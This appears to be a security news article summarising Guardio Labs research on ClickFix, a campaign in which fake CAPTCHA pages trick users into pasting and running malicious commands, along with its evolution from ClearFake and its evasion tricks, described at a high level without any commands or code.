ClickFix Malware Uses Fake CAPTCHAs for Infections

A sophisticated blend of propagation methods, clever narratives, and advanced evasion techniques has fueled the rise of the social engineering tactic known as ClickFix over the past year, according to new research from Guardio Labs.

Security researcher Shaked Chen notes that this new strain has rapidly outpaced the infamous fake browser update scam.

“Like a real-world virus variant, this new ‘ClickFix’ strain quickly outpaced and ultimately wiped out the infamous fake browser update scam that plagued the web just last year,” Chen stated in a report. “It did so by removing the need for file downloads, using smarter social engineering tactics, and spreading through trusted infrastructure. The result - a wave of infections ranging from mass drive-by attacks to hyper-targeted spear-phishing lures.”

What is the ClickFix Tactic?

First detected in the wild in early 2024, ClickFix is a social engineering tactic where prospective targets are tricked into infecting their own machines. The attack masquerades as a necessary fix for a non-existent issue or a simple CAPTCHA verification.

Attackers use a wide range of infection vectors, including phishing emails, drive-by downloads, malvertising, and search engine optimization (SEO) poisoning, to lure users to counterfeit pages displaying these error messages.

How the Attack Infects Systems

The fake pages have a single objective: to guide victims through a series of steps that cause them to unknowingly copy a malicious command to their clipboard. The user is then instructed to paste and execute this command in the Windows Run dialog box or the Terminal app on Apple macOS.

This nefarious command triggers a multi-stage sequence, ultimately deploying various types of malware. The payloads can include information stealers, remote access trojans (RATs), and loaders, highlighting the flexibility of this attack method.

An Evolved Threat: From ClearFake to CAPTCHAgeddon

The tactic has become so potent and effective that Guardio Labs has dubbed the phenomenon a “CAPTCHAgeddon,” with dozens of campaigns being launched by both cybercriminal groups and nation-state actors in a short period.

ClickFix is considered a more stealthy evolution of ClearFake, another malware campaign that used compromised WordPress sites to show fake browser update pop-ups. ClearFake later integrated advanced evasion tactics like EtherHiding to conceal its payload using Binance’s Smart Chain (BSC) contracts.

The success of ClickFix stems from its continuous refinement of propagation vectors, lure messaging, and evasion techniques, which have allowed it to ultimately supplant the ClearFake campaign.

“Early prompts were generic, but they quickly became more persuasive, adding urgency or suspicion cues,” Chen explained. “These tweaks increased compliance rates by exploiting basic psychological pressure.”

Advanced Evasion and Refinement

Attackers have adapted their methods in several notable ways to avoid detection. They have abused Google Scripts to host the fake CAPTCHA flows, leveraging the inherent trust in Google’s domain. Additionally, they have embedded malicious payloads within legitimate-looking file sources, such as socket.io.min.js, to appear benign.

Chen concluded with a stark warning about the technical sophistication of these threat actors.

“This chilling list of techniques – obfuscation, dynamic loading, legitimate-looking files, cross-platform handling, third-party payload delivery, and abuse of trusted hosts like Google – demonstrates how threat actors have continuously adapted to avoid detection. It is a stark reminder that these attackers are not just refining their phishing lures or social engineering tactics but are investing heavily in technical methods to ensure their attacks remain effective and resilient against security measures.”